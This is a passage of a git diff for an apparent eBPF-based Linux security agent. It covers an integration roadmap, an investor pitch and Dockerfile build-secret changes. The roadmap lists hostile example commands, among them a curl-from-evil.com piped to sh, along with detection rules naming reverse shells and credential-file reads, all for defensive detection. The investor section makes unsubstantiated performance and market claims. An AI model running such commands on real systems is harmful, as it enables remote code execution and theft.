`*_2-3-4-8_*_*` | 🔄 Port to Rust | +| JA4DB Integration | Load fingerprints from ja4db.com API or local files | 🔄 Port to Rust | +| TC Ingress Mode | Safe mode using Traffic Control (TC) ingress hook | 🔄 Port to Rust | +| XDP Driver Mode | High-performance native XDP mode | 🔄 Port to Rust | +| XDP HW Offload Mode | Hardware-accelerated XDP for maximum performance | 🔄 Port to Rust | + +**Source:** [nstealth](../nstealth/) - Go implementation using cilium/ebpf + +### rust-fail2ban + +Log monitoring and intrusion prevention library. Already implemented in Rust. + +| Feature | Description | Status | +|---------|-------------|--------| +| Filter Config Parsing | Parse fail2ban INI-style filter configuration files | ✅ Ready | +| Variable Substitution | Support `%(name)s` interpolation in patterns | ✅ Ready | +| Tag Expansion | ``, ``, ``, ``, `` tags | ✅ Ready | +| Regex Compilation | Compile patterns with optimized matching | ✅ Ready | +| Fast Filter | Prefix-based matching for high-throughput log processing | ✅ Ready | +| Log Monitoring | Real-time log file watching with inotify | ✅ Ready | +| Log Rotation Handling | Detect and handle log rotation seamlessly | ✅ Ready | +| Attack Recording | Hybrid adaptive batching (real-time ↔ batch mode based on attack rate) | ✅ Ready | +| State Persistence | SQLite-backed state across restarts | ✅ Ready | +| Ban Decision Logic | Configurable `max_retries` within `window_secs` threshold | ✅ Ready | +| Rate Tracking | Sliding window attack rate calculation | ✅ Ready | +| Mode Switching | Auto-switch between real-time and batch mode at configurable threshold | ✅ Ready | +| Expired Event Cleanup | Automatic cleanup of old attack records | ✅ Ready | +| Fail2ban Compatibility | Compatible with existing fail2ban filter.d files | ✅ Ready | + +**Source:** [rust-fail2ban](../rust-fail2ban/) - Rust library + +## Combined Architecture After All Integrations + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ SYNAPSE AGENT (FULLY INTEGRATED) │ +├─────────────────────────────────────────────────────────────────┤ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ NETWORK LAYER │ │ +│ │ moat XDP + nstealth (Rust port) │ │ +│ │ ─────────────────────────────────────────────────────── │ │ +│ │ • IP/CIDR filtering • JA4T fingerprint blocking │ │ +│ │ • Rate limiting • JA4 TLS fingerprint blocking │ │ +│ │ • TCP fingerprint • JA4H HTTP fingerprint blocking │ │ +│ │ • DDoS mitigation • JA4L latency analysis │ │ +│ │ • GeoIP filtering • Wildcard pattern matching │ │ +│ │ • Forward/redirect mode │ │ +│ │ • Whitelist-only mode │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ HOST LAYER │ │ +│ │ bpfjailer (LSM) + rust-fail2ban │ │ +│ │ ─────────────────────────────────────────────────────── │ │ +│ │ • Process tracking • Log file monitoring │ │ +│ │ • File access MAC • Attack pattern detection │ │ +│ │ • Exec control • Ban decision (retries/window) │ │ +│ │ • Per-process network • State persistence │ │ +│ │ • Secrets protection • Adaptive batching │ │ +│ │ • Audit events • Fail2ban filter compatibility │ │ +│ │ • Auto-enrollment • Log rotation handling │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ MANAGEMENT LAYER │ │ +│ │ • Gen0Sec API sync • Prometheus metrics │ │ +│ │ • Unified config • Health endpoints │ │ +│ │ • Redis caching • Audit logging │ │ +│ │ • JA4DB sync • Inter-agent sync │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└─────────────────────────────────────────────────────────────────┘ +``` + +## Feature Matrix After All Integrations + +| Capability | moat | bpfjailer | nstealth | rust-fail2ban | Combined | +|------------|------|-----------|----------|---------------|----------| +| **Network Layer** | | | | | | +| IP/CIDR blocking (XDP) | ✅ | - | - | - | ✅ | +| Rate limiting | ✅ | - | - | - | ✅ | +| JA4T fingerprint blocking | ⚠️ collect | - | ✅ block | - | ✅ | +| JA4 TLS fingerprint blocking | ⚠️ collect | - | ✅ block | - | ✅ | +| JA4H HTTP fingerprint blocking | ⚠️ collect | - | ✅ block | - | ✅ | +| JA4L latency fingerprinting | - | - | ✅ | - | ✅ | +| Traffic forwarding/redirect | - | - | ✅ | - | ✅ | +| Whitelist-only mode | - | - | ✅ | - | ✅ | +| Wildcard fingerprint matching | - | - | ✅ | - | ✅ | +| **Host Layer** | | | | | | +| Process sandboxing | - | ✅ | - | - | ✅ | +| File access control (MAC) | - | ✅ | - | - | ✅ | +| Exec control | - | ✅ | - | - | ✅ | +| Per-process network rules | - | ✅ | - | - | ✅ | +| Secrets protection | - | ✅ | - | - | ✅ | +| **Log-Based Detection** | | | | | | +| Log file monitoring | - | - | - | ✅ | ✅ | +| Attack pattern detection | - | - | - | ✅ | ✅ | +| Adaptive ban logic | - | - | - | ✅ | ✅ | +| Fail2ban filter compatibility | - | - | - | ✅ | ✅ | +| State persistence | - | - | - | ✅ | ✅ | + +## Gap Analysis: Solutions for Missing Features + +### Script Execution Tracking + +**Current state:** bpfjailer has `bprm_check_security` hook which controls exec, but doesn't capture interpreter arguments (e.g., `python malicious.py`). + +**Solution approaches:** + +| Approach | Implementation | Complexity | Component | +|----------|----------------|------------|-----------| +| execve tracepoint | BPF tracepoint on `sys_enter_execve` to capture full argv | Medium | bpfjailer | +| cmdline monitoring | Read `/proc/[pid]/cmdline` after exec | Easy | bpfjailer | +| Interpreter tracking | Track when python/bash/node opens script files via `file_open` | Medium | bpfjailer | +| Script file hashing | Hash script files on open by known interpreters | Medium | bpfjailer | + +**Recommended implementation:** Add BPF tracepoint on `sys_enter_execve` in bpfjailer to capture: +- Full command line (interpreter + script + arguments) +- Working directory +- Environment variables (optional, high volume) + +**Example detections enabled:** +``` +python3 /tmp/malicious.py --exfil +bash -c "curl http://evil.com | sh" +node -e "require('child_process').exec('whoami')" +``` + +### Automated Sandboxing + +**bpfjailer capabilities:** Runtime sandboxing (isolate running processes) - YES. Detonation sandboxing (analyze suspicious files) - NO. + +| Sandboxing Type | bpfjailer | Notes | +|-----------------|-----------|-------| +| Runtime isolation | ✅ Yes | Enroll suspicious process into `restricted` role immediately | +| Pre-execution sandbox | ✅ Yes | Auto-enroll by executable path before it runs | +| Network containment | ✅ Yes | Block all network for sandboxed process | +| File containment | ✅ Yes | Restrict file access to `/tmp/sandbox/` only | +| Detonation sandbox | ❌ No | Requires separate VM/container (Firecracker) | + +**Proposed `auto_sandbox` role for bpfjailer:** +```json +{ + "auto_sandbox": { + "id": 99, + "flags": { + "allow_file_access": true, + "allow_network": false, + "allow_exec": false + }, + "file_paths": [ + {"pattern": "/tmp/sandbox/", "allow": true}, + {"pattern": "/proc/self/", "allow": true}, + {"pattern": "/", "allow": false} + ] + } +} +``` + +**For detonation sandboxing (future):** +- Lightweight VM integration (Firecracker) +- File submission API +- Behavioral analysis inside sandbox +- Separate project scope + +### Indicators of Attack (IOA) - Required Data + +JA4+ provides **connection fingerprints** (who/what is connecting). IOAs require **behavioral patterns** (what they're doing after connecting). + +#### Data Sources Needed + +| Data Type | Source | Have Today? | Component | +|-----------|--------|-------------|-----------| +| Network fingerprints | JA4T, JA4, JA4H, JA4L | ✅ | moat + nstealth | +| Process execution | execve tracepoint | ❌ Need | bpfjailer | +| Process tree | fork/clone tracking | ❌ Need | bpfjailer | +| Command lines | execve argv capture | ❌ Need | bpfjailer | +| File operations | file_open, file_write | ✅ | bpfjailer | +| Network per-process | socket_connect/bind | ✅ | bpfjailer | +| DNS queries | DNS packet parsing | ❌ Need | moat XDP | +| User context | uid/gid on syscalls | ⚠️ Partial | bpfjailer | +| Timing/sequences | Event correlation | ❌ Need | New component | + +#### IOA Pattern Examples + +| IOA Pattern | Required Data | Current Status | +|-------------|---------------|----------------| +| Reverse shell | Process spawns shell → shell connects outbound | ⚠️ Partial | +| Credential dumping | Process reads `/etc/shadow`, `.ssh/`, `.aws/` | ✅ bpfjailer | +| Lateral movement | SSH/RDP outbound after initial access | ⚠️ Need process correlation | +| Data staging | Large file writes to /tmp before exfil | ⚠️ Need file size tracking | +| Living off the land | `curl` piped to `bash` | ❌ Need cmdline tracking | +| Persistence | Writes to cron, systemd, rc.local | ✅ bpfjailer file rules | +| Privilege escalation | setuid call after file modification | ✅ bpfjailer setuid control | + +#### IOA Implementation Roadmap + +| Priority | Feature | Component | Difficulty | +|----------|---------|-----------|------------| +| 1 | Full cmdline capture on exec | bpfjailer | Medium | +| 2 | Process tree tracking (parent PID) | bpfjailer | Medium | +| 3 | DNS query logging | moat XDP | Medium | +| 4 | Event correlation engine | New (Rust) | Hard | +| 5 | IOA rule engine (YAML-based) | New (Rust) | Medium | + +#### IOA Data Collection Architecture + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ IOA DATA COLLECTION │ +├─────────────────────────────────────────────────────────────────┤ +│ │ +│ NETWORK (have) PROCESS (need) FILE (have) │ +│ ───────────── ────────────── ───────── │ +│ • JA4T fingerprint • Full cmdline • Open/read │ +│ • JA4 TLS fingerprint • Process tree • Write/create │ +│ • JA4H HTTP headers • Parent PID • Delete │ +│ • JA4L latency • User/group • Rename │ +│ • Src/dst IP:port • Working dir • Permission chg │ +│ • DNS queries (need) • Timestamps • Path patterns │ +│ │ +├─────────────────────────────────────────────────────────────────┤ +│ EVENT CORRELATION ENGINE │ +├─────────────────────────────────────────────────────────────────┤ +│ • Sequence detection (A → B → C within time window) │ +│ • Process ancestry tracking (shell → curl → bash) │ +│ • Cross-source correlation (network + file + process) │ +│ • Anomaly scoring per process/user │ +│ • IOA rule matching (YAML-defined patterns) │ +└─────────────────────────────────────────────────────────────────┘ +``` + +#### Example IOA Rule Format (Proposed) + +```yaml +rules: + - name: "Reverse Shell Detection" + description: "Detect shell spawned that connects outbound" + severity: critical + sequence: + - event: exec + match: + cmdline: "*/bin/sh*|*/bin/bash*|*/bin/zsh*" + capture: shell_pid + - event: connect + match: + process: "$shell_pid" + port: "!22,!443,!80" + direction: outbound + within: 5s + action: alert + + - name: "Curl to Bash" + description: "Detect curl output piped to bash" + severity: high + sequence: + - event: exec + match: + cmdline: "*curl*|*wget*" + capture: downloader_pid + - event: exec + match: + parent_pid: "$downloader_pid" + cmdline: "*/bin/bash*|*/bin/sh*" + within: 1s + action: alert +``` + +--- + +## Implementation Roadmap + +### Timeline Overview + +``` +Phase 1 (Foundation) ████████░░░░░░░░░░░░░░░░░░░░░░░░ 2-3 weeks +Phase 2 (Integrations) ░░░░░░░░████████████░░░░░░░░░░░░ 3-4 weeks +Phase 3 (nstealth Port) ░░░░░░░░░░░░░░░░░░░░████████░░░░ 2-3 weeks +Phase 4 (IOA Engine) ░░░░░░░░░░░░░░░░░░░░░░░░░░░░████ 4-6 weeks + |-------|-------|-------|-------| + Week 0 Week 4 Week 8 Week 12 Week 16 +``` + +### Phase 1: Foundation (2-3 weeks) + +Core infrastructure and bpfjailer integration. + +| Task | Estimate | Dependencies | Deliverable | +|------|----------|--------------|-------------| +| Add bpfjailer as workspace member | 1-2 days | None | Updated Cargo.toml | +| Create `security/lsm/` module structure | 2-3 days | Above | mod.rs, process_tracker.rs, policy.rs | +| Unified policy format (YAML schema) | 2-3 days | Module structure | Policy types and parsing | +| LSM subsystem initialization in main.rs | 2-3 days | All above | BPF LSM loads with agent mode | +| Unified telemetry (BPF stats + LSM audit) | 3-4 days | Initialization | Combined metrics/logging | +| Integration tests | 2-3 days | All above | CI test suite | + +**Milestone 1:** Agent mode starts with both XDP and LSM protection active. + +### Phase 2: rust-fail2ban + Operational Features (3-4 weeks) + +Log-based detection and operational improvements. + +| Task | Estimate | Dependencies | Deliverable | +|------|----------|--------------|-------------| +| rust-fail2ban integration | 3-4 days | Phase 1 | Log monitoring in agent | +| Connect ban decisions to XDP blocklist | 2-3 days | Above | Auto-block attacking IPs | +| Prometheus metrics endpoint | 2-3 days | Phase 1 | /metrics HTTP endpoint | +| Health check endpoint | 1-2 days | Phase 1 | /health HTTP endpoint | +| Config hot-reload (SIGHUP) | 2-3 days | Phase 1 | Reload without restart | +| Graceful degradation (RFM) | 2-3 days | Phase 1 | Fallback when BPF unavailable | +| Audit logging mode | 2-3 days | Phase 1 | Log-only mode for compliance | +| Tap/mirror mode | 2-3 days | Phase 1 | Passive monitoring mode | + +**Milestone 2:** Production-ready agent with log-based detection and operational tooling. + +### Phase 3: nstealth Rust Port (2-3 weeks) + +JA4+ fingerprint blocking at connection level. + +| Task | Estimate | Dependencies | Deliverable | +|------|----------|--------------|-------------| +| JA4T extraction in XDP | 3-4 days | Phase 1 | TCP fingerprint capture | +| JA4T blocking logic | 2-3 days | Above | Block by TCP fingerprint | +| JA4 TLS extraction (existing moat code) | 1-2 days | Phase 1 | Verify existing code | +| JA4 blocking integration | 2-3 days | Above | Block by TLS fingerprint | +| JA4H HTTP extraction | 2-3 days | Phase 2 | HTTP header fingerprinting | +| JA4H blocking | 2-3 days | Above | Block by HTTP fingerprint | +| JA4L latency tracking | 2-3 days | Phase 1 | Latency-based fingerprinting | +| Wildcard pattern matching | 1-2 days | All fingerprints | Pattern like `8192_*_1460_*` | +| JA4DB sync integration | 2-3 days | Above | Load fingerprints from ja4db.com | +| Drop/forward/whitelist modes | 2-3 days | All above | Mode configuration | + +**Milestone 3:** Full JA4+ fingerprint blocking (drop known-bad, whitelist-only mode). + +### Phase 4: IOA Engine (4-6 weeks) + +Behavioral detection and correlation. + +| Task | Estimate | Dependencies | Deliverable | +|------|----------|--------------|-------------| +| execve tracepoint (full cmdline) | 3-4 days | Phase 1 | Command line capture | +| Process tree tracking (PPID) | 3-4 days | Above | Parent-child relationships | +| DNS query logging in XDP | 3-4 days | Phase 1 | DNS request/response logging | +| Event buffer (ring buffer) | 3-4 days | All above | Shared event queue | +| Event correlation engine | 5-7 days | Event buffer | Sequence matching | +| IOA rule parser (YAML) | 3-4 days | Correlation engine | Rule definition format | +| Built-in IOA rules (top 10) | 3-4 days | Rule parser | Default detection rules | +| Alert/action system | 2-3 days | All above | Alert routing, actions | +| IOA testing framework | 2-3 days | All above | Test IOA rules | + +**Milestone 4:** Behavioral detection with IOA rules (reverse shell, curl-to-bash, etc.). + +### Phase 5: Advanced Features (Optional, 4-8 weeks) + +Extended capabilities for future releases. + +| Task | Estimate | Dependencies | Deliverable | +|------|----------|--------------|-------------| +| Inter-agent sync (gossip/Redis) | 5-7 days | Phase 2 | Shared blocklists | +| Remote shell access | 5-7 days | Phase 2 | Secure incident response | +| Auto-remediation playbooks | 5-7 days | Phase 4 | Automated response | +| Threat hunting query interface | 5-7 days | Phase 4 | Historical event search | +| Detonation sandbox (Firecracker) | 2-3 weeks | Phase 4 | Suspicious file analysis | +| ML behavioral scoring | 4-6 weeks | Phase 4 | Anomaly detection | + +### Dependencies Graph + +``` +Phase 1 (Foundation) + │ + ├──────────────────┬──────────────────┐ + ▼ ▼ ▼ +Phase 2 Phase 3 Phase 4 +(rust-fail2ban) (nstealth port) (IOA Engine) + │ │ │ + └──────────────────┴──────────────────┘ + │ + ▼ + Phase 5 + (Advanced Features) +``` + +### Estimated Total Timeline + +| Phase | Duration | Cumulative | +|-------|----------|------------| +| Phase 1: Foundation | 2-3 weeks | Week 3 | +| Phase 2: Operational | 3-4 weeks | Week 7 | +| Phase 3: nstealth | 2-3 weeks | Week 10 | +| Phase 4: IOA Engine | 4-6 weeks | Week 16 | +| Phase 5: Advanced | 4-8 weeks | Week 24 | + +**Minimum viable product (MVP):** Phases 1-2 complete in ~7 weeks. +**Full JA4+ protection:** Phases 1-3 complete in ~10 weeks. +**Full IOA detection:** Phases 1-4 complete in ~16 weeks. + +### Risk Factors + +| Risk | Impact | Mitigation | +|------|--------|------------| +| Kernel compatibility issues (BPF LSM) | High | Test matrix, graceful fallback | +| nstealth Go→Rust port complexity | Medium | Port incrementally, start with JA4T | +| IOA rule false positives | Medium | Extensive testing, tunable thresholds | +| Performance regression | Medium | Benchmark each phase, optimize hotspots | +| Integration conflicts (shared BPF maps) | Medium | Careful map naming, coordination | + +### Success Criteria + +| Milestone | Criteria | +|-----------|----------| +| Phase 1 | Agent starts with XDP + LSM, process enrollment works | +| Phase 2 | Log monitoring detects SSH brute force, auto-blocks attacker | +| Phase 3 | Known malicious JA4 fingerprint blocked at connection time | +| Phase 4 | IOA rule detects `curl | bash` execution pattern | + +### Parallel Work Opportunities + +These tasks can be worked on in parallel by different developers: + +| Track A (BPF/Kernel) | Track B (Userspace) | +|----------------------|---------------------| +| bpfjailer integration | rust-fail2ban integration | +| JA4T XDP extraction | Prometheus/health endpoints | +| execve tracepoint | Config hot-reload | +| DNS query logging | IOA rule parser | +| Process tree tracking | Alert/action system | diff --git a/investor.md b/investor.md new file mode 100644 index 0000000..871b39b --- /dev/null +++ b/investor.md @@ -0,0 +1,380 @@ +# Synapse Security Platform - Investor Overview + +## Executive Summary + +Synapse is a next-generation Linux endpoint security platform that delivers enterprise-grade protection at a fraction of incumbent costs. By leveraging cutting-edge kernel technologies (eBPF/XDP), Synapse provides both network-level and host-level security in a single lightweight agent. + +**Key Value Propositions:** +- **Performance:** 10-100x faster packet processing than traditional firewalls via kernel bypass +- **Cost Efficiency:** Single agent replaces multiple point solutions (WAF, EDR, IPS) +- **Modern Architecture:** Purpose-built for cloud-native, containerized environments +- **Linux-First:** Optimized for the dominant server OS (96%+ of cloud workloads) + +--- + +## Market Opportunity + +### Total Addressable Market + +| Segment | 2024 Market Size | CAGR | 2028 Projection | +|---------|------------------|------|-----------------| +| Endpoint Security | $18.5B | 8.2% | $25.4B | +| Cloud Workload Protection | $5.2B | 24.5% | $12.4B | +| Web Application Firewall | $6.2B | 17.1% | $11.5B | +| **Combined TAM** | **$29.9B** | | **$49.3B** | + +### Target Segments + +1. **Cloud-Native Companies** - Kubernetes, containerized workloads +2. **AI/ML Infrastructure** - Securing AI agents and model serving +3. **Financial Services** - High-performance, low-latency requirements +4. **Managed Security Providers** - Multi-tenant security platform + +--- + +## Competitive Positioning + +### vs. CrowdStrike Falcon (Market Leader) + +| Capability | CrowdStrike | Synapse | Advantage | +|------------|-------------|---------|-----------| +| **Performance** | Userspace agent | Kernel-native (eBPF) | 10-100x faster | +| **Resource Usage** | 200-500MB RAM | <50MB RAM | 80% lighter | +| **Network Protection** | Basic | Advanced (XDP/TC) | Full stack | +| **Pricing** | $8-15/endpoint/mo | Competitive | 40-60% savings | +| **Linux Optimization** | Cross-platform | Linux-native | Purpose-built | +| **AI Agent Security** | Limited | Built-in | First-mover | + +### Competitive Matrix + +``` + Network Security ───────────────────▶ + │ + │ ┌─────────────┐ + │ │ SYNAPSE │ ← Unified platform + │ │ (moat + │ + Host │ │ bpfjailer) │ + Security │ └─────────────┘ + │ │ + │ ┌────┴────┐ ┌───────────┐ + │ │CrowdStrike │ Cloudflare│ + │ │ Falcon │ │ WAF │ + ▼ └──────────┘ └───────────┘ + │ + Traditional Network-only + EDR solutions +``` + +### Key Differentiators + +1. **Kernel-Native Performance** + - eBPF/XDP processes packets before the kernel network stack + - Handles 10M+ packets/second on commodity hardware + - Zero-copy packet processing + +2. **Unified Agent** + - Network protection (firewall, WAF, DDoS mitigation) + - Host protection (process control, file access, secrets) + - Log-based detection (fail2ban-compatible) + - Single binary, single configuration + +3. **AI Agent Security** (First-to-Market) + - Protect AI workloads from data exfiltration + - Block access to sensitive credentials + - Enforce proxy policies for external API calls + - SSRF protection for internal networks + +4. **Advanced Fingerprinting (JA4+ Suite)** + - Identify and block malicious connections by behavior + - Bot detection without CAPTCHAs + - Zero-day protection via behavioral analysis + +--- + +## Product Architecture + +### Platform Overview + +``` +┌────────────────────────────────────────────────────────────────┐ +│ SYNAPSE PLATFORM │ +├────────────────────────────────────────────────────────────────┤ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ MANAGEMENT PLANE (Gen0Sec) │ │ +│ │ • Cloud console • Policy management │ │ +│ │ • Threat intelligence • Fleet management │ │ +│ │ • Analytics & reporting • Alert routing │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ │ +│ ┌──────────────────────────┴───────────────────────────────┐ │ +│ │ SYNAPSE AGENT │ │ +│ │ │ │ +│ │ NETWORK LAYER HOST LAYER │ │ +│ │ ───────────── ────────── │ │ +│ │ • Packet filtering • Process sandboxing │ │ +│ │ • DDoS protection • File access control │ │ +│ │ • TLS fingerprinting • Secrets protection │ │ +│ │ • Rate limiting • Audit logging │ │ +│ │ • GeoIP blocking • Intrusion detection │ │ +│ │ │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────────────────────────────────────────┘ +``` + +### Technology Stack + +| Component | Technology | Benefit | +|-----------|------------|---------| +| Packet Processing | XDP (eXpress Data Path) | Kernel bypass, line-rate filtering | +| Host Security | BPF LSM (Linux Security Module) | Zero-overhead mandatory access control | +| Fingerprinting | JA4+ Suite | Behavioral identification | +| Log Analysis | Rust-native engine | 10x faster than Python alternatives | +| State Management | SQLite + Redis | Reliable, low-latency | + +--- + +## Product Roadmap + +### Current Capabilities (Available Now) + +**Network Protection** +- IP/CIDR blocking at wire speed +- DDoS mitigation (SYN flood, amplification attacks) +- TCP/TLS fingerprint collection +- GeoIP-based filtering (country, ASN, city) +- Rate limiting per IP/subnet +- Web Application Firewall (WAF) + +**Host Protection** (via bpfjailer integration) +- Process sandboxing with role-based policies +- File access control (block sensitive paths) +- Network control per-process +- Secrets protection (SSH keys, cloud credentials) +- Audit trail for compliance + +**Management** +- Cloud management console (Gen0Sec) +- Threat intelligence integration +- Real-time policy updates + +### Roadmap + +| Phase | Timeline | Deliverables | Business Impact | +|-------|----------|--------------|-----------------| +| **Phase 1** | Q1 2025 | Unified agent release | Single-agent value prop | +| **Phase 2** | Q2 2025 | Log-based detection, operational tooling | Replaces fail2ban, monitoring | +| **Phase 3** | Q2-Q3 2025 | JA4+ fingerprint blocking | Bot protection, zero-day defense | +| **Phase 4** | Q3-Q4 2025 | Behavioral detection (IOA) | Threat hunting, advanced detection | +| **Phase 5** | 2026 | ML-based anomaly detection | Autonomous threat response | + +### Milestone Details + +**Phase 1: Unified Agent (Q1 2025)** +- Combine network and host protection in single agent +- Production-ready for Linux workloads +- *Enables: Single-agent pricing, simplified deployment* + +**Phase 2: Operational Excellence (Q2 2025)** +- Prometheus metrics integration +- Health monitoring endpoints +- Hot-reload configuration +- Log-based intrusion detection +- *Enables: Enterprise operations, compliance (SOC2, ISO27001)* + +**Phase 3: Advanced Fingerprinting (Q2-Q3 2025)** +- Block connections by TLS/TCP fingerprint +- Bot detection without user friction +- Integration with JA4 threat database +- *Enables: Bot protection market, reduces false positives* + +**Phase 4: Behavioral Detection (Q3-Q4 2025)** +- Detect attack patterns (reverse shells, data exfiltration) +- Process tree analysis +- Customizable detection rules +- *Enables: Threat hunting, incident response automation* + +--- + +## Use Cases + +### 1. Cloud Infrastructure Protection + +**Challenge:** Secure Kubernetes clusters and cloud VMs from network attacks and compromised containers. + +**Solution:** Deploy Synapse agent on each node for: +- Network-level DDoS protection +- Container escape prevention +- Lateral movement blocking +- Compliance audit trail + +**Value:** 60% cost reduction vs. CrowdStrike + Cloudflare combo + +### 2. AI Agent Security + +**Challenge:** AI agents (Claude, GPT-based apps) need access to tools but pose data exfiltration risk. + +**Solution:** Synapse `ai_agent` role provides: +- Block access to SSH keys, cloud credentials +- Prevent SSRF to internal networks +- Enforce API proxy for external calls +- Audit all actions for review + +**Value:** Enable AI deployment without security compromise (first-to-market) + +### 3. High-Frequency Trading / Low-Latency + +**Challenge:** Security solutions add latency; financial systems require microsecond response. + +**Solution:** Synapse XDP processes packets in <1 microsecond, compared to 100+ microseconds for traditional firewalls. + +**Value:** Security without latency penalty (competitive advantage) + +### 4. Managed Security Service Providers (MSSPs) + +**Challenge:** Manage security across hundreds of customer environments efficiently. + +**Solution:** Multi-tenant Synapse deployment with: +- Per-customer policy isolation +- Centralized threat intelligence +- Automated response playbooks +- White-label console option + +**Value:** Higher margins, lower operational overhead + +--- + +## Business Model + +### Pricing Strategy + +| Tier | Target | Features | Price Point | +|------|--------|----------|-------------| +| **Starter** | SMB | Network protection, basic host security | $3/endpoint/mo | +| **Professional** | Mid-market | Full platform, threat intel, log detection | $6/endpoint/mo | +| **Enterprise** | Large enterprise | Custom rules, dedicated support, SLA | $10/endpoint/mo | +| **Platform** | MSSPs | Multi-tenant, API access, white-label | Custom | + +### Revenue Projections + +| Metric | Year 1 | Year 2 | Year 3 | +|--------|--------|--------|--------| +| Protected Endpoints | 10,000 | 75,000 | 300,000 | +| ARR | $500K | $4M | $18M | +| Gross Margin | 75% | 80% | 85% | + +### Go-to-Market Strategy + +1. **Developer-Led Growth** + - Open-source components (rust-fail2ban, bpfjailer) + - GitHub presence and documentation + - Technical blog content and conference talks + +2. **Cloud Marketplace** + - AWS Marketplace listing + - GCP Marketplace listing + - One-click deployment for cloud workloads + +3. **Channel Partners** + - MSSP partnerships + - System integrator relationships + - Cloud provider security programs + +--- + +## Team & Technology Moat + +### Technical Advantages + +1. **Kernel Expertise** + - Deep eBPF/XDP knowledge (rare skillset) + - Linux kernel security module experience + - Performance optimization at scale + +2. **Proprietary Technology** + - Custom BPF programs for security enforcement + - JA4+ fingerprinting implementation + - Adaptive batching algorithms for high-volume events + +3. **Integration Depth** + - Fail2ban filter compatibility (leverage existing ecosystem) + - Seamless cloud platform integration + - Container-native design + +### Intellectual Property + +| Asset | Status | Protection | +|-------|--------|------------| +| XDP packet filtering algorithms | Developed | Trade secret | +| BPF LSM security policies | Developed | Trade secret | +| JA4+ fingerprint matching | Porting | Patent pending | +| Behavioral detection rules | In development | Trade secret | + +--- + +## Investment Highlights + +### Why Invest Now + +1. **Market Timing** + - eBPF technology reaching maturity + - Cloud security spending accelerating (24% CAGR) + - AI agent security is greenfield opportunity + +2. **Competitive Position** + - 18-24 month technology lead vs. incumbents + - Linux-native approach as cloud shifts to containers + - Cost advantage enables aggressive pricing + +3. **Capital Efficiency** + - Lean team with kernel expertise + - Open-source leverage reduces R&D cost + - SaaS model with high gross margins + +### Key Metrics (Target) + +| Metric | Current | 12-Month Target | +|--------|---------|-----------------| +| Protected Endpoints | Beta | 10,000 | +| Monthly Active Users | Private beta | 500 | +| Net Revenue Retention | N/A | >120% | +| CAC Payback | N/A | <12 months | + +### Use of Funds + +| Category | Allocation | Purpose | +|----------|------------|---------| +| Engineering | 50% | Complete roadmap Phases 1-3 | +| Sales & Marketing | 25% | Cloud marketplace, content, events | +| Operations | 15% | Infrastructure, support, compliance | +| G&A | 10% | Legal, finance, facilities | + +--- + +## Risk Factors + +| Risk | Mitigation | +|------|------------| +| Linux-only platform | Cloud workloads are 96%+ Linux; Windows/Mac can be added later | +| Kernel compatibility | Extensive test matrix; graceful fallback modes | +| CrowdStrike competition | Performance/cost advantage; niche focus (Linux, AI agents) | +| Talent acquisition | Remote-first; open-source community engagement | +| Enterprise sales cycle | Product-led growth; cloud marketplace reduces friction | + +--- + +## Summary + +Synapse represents a generational shift in endpoint security: + +- **Technology:** Kernel-native architecture delivers 10-100x performance improvement +- **Market:** $50B+ combined TAM in endpoint, cloud workload, and WAF security +- **Timing:** eBPF maturity + cloud growth + AI security demand = perfect storm +- **Differentiation:** Unified agent, Linux-native, AI agent security (first-mover) +- **Business Model:** SaaS with 80%+ gross margins and developer-led growth + +**We're building the security platform for the next decade of cloud infrastructure.** + +--- + +*For more information, contact: [investor-relations@gen0sec.com]* diff --git a/pkg/deb/Dockerfile b/pkg/deb/Dockerfile index 7fbc461..3c79ad4 100644 --- a/pkg/deb/Dockerfile +++ b/pkg/deb/Dockerfile @@ -59,8 +59,22 @@ RUN mkdir -p /output COPY pkg/deb/builder.sh /usr/local/bin/builder.sh RUN chmod +x /usr/local/bin/builder.sh -# Build the package -RUN /usr/local/bin/builder.sh +# Private git deps: pass --secret id=github_token,env=GITHUB_TOKEN at build time. +# With REQUIRE_GITHUB_TOKEN=1, build fails if secret is missing or empty. +ARG REQUIRE_GITHUB_TOKEN=1 +RUN --mount=type=secret,id=github_token,required=false \ + if [ "$REQUIRE_GITHUB_TOKEN" = "1" ]; then \ + [ -f /run/secrets/github_token ] && [ -s /run/secrets/github_token ] || { echo "ERROR: REQUIRE_GITHUB_TOKEN=1 but github_token secret missing or empty. Pass: --secret id=github_token,env=GITHUB_TOKEN"; exit 1; }; \ + fi && \ + if [ -f /run/secrets/github_token ] && [ -s /run/secrets/github_token ]; then \ + echo "github_token: present" && \ + export GITHUB_TOKEN=$(tr -d '\n\r' < /run/secrets/github_token) && \ + git config --global url."https://x-access-token:${GITHUB_TOKEN}@github.com/".insteadOf "https://github.com/" && \ + export CARGO_NET_GIT_FETCH_WITH_CLI=true; \ + else \ + echo "github_token: not provided (public deps only)"; \ + fi && \ + /usr/local/bin/builder.sh COPY pkg/deb/docker/entrypoint.sh /usr/local/bin/entrypoint.sh RUN chmod +x /usr/local/bin/entrypoint.sh diff --git a/pkg/docker/Dockerfile b/pkg/docker/Dockerfile index 8702c1b..52d1265 100644 --- a/pkg/docker/Dockerfile +++ b/pkg/docker/Dockerfile @@ -52,7 +52,22 @@ WORKDIR /app COPY . . -RUN cargo build --release +# Private git deps: pass --secret id=github_token,env=GITHUB_TOKEN at build time. +# With REQUIRE_GITHUB_TOKEN=1, build fails if secret is missing or empty. +ARG REQUIRE_GITHUB_TOKEN=1 +RUN --mount=type=secret,id=github_token,required=false \ + if [ "$REQUIRE_GITHUB_TOKEN" = "1" ]; then \ + [ -f /run/secrets/github_token ] && [ -s /run/secrets/github_token ] || { echo "ERROR: REQUIRE_GITHUB_TOKEN=1 but github_token secret missing or empty. Pass: --secret id=github_token,env=GITHUB_TOKEN"; exit 1; }; \ + fi && \ + if [ -f /run/secrets/github_token ] && [ -s /run/secrets/github_token ]; then \ + echo "github_token: present" && \ + export GITHUB_TOKEN=$(tr -d '\n\r' < /run/secrets/github_token) && \ + git config 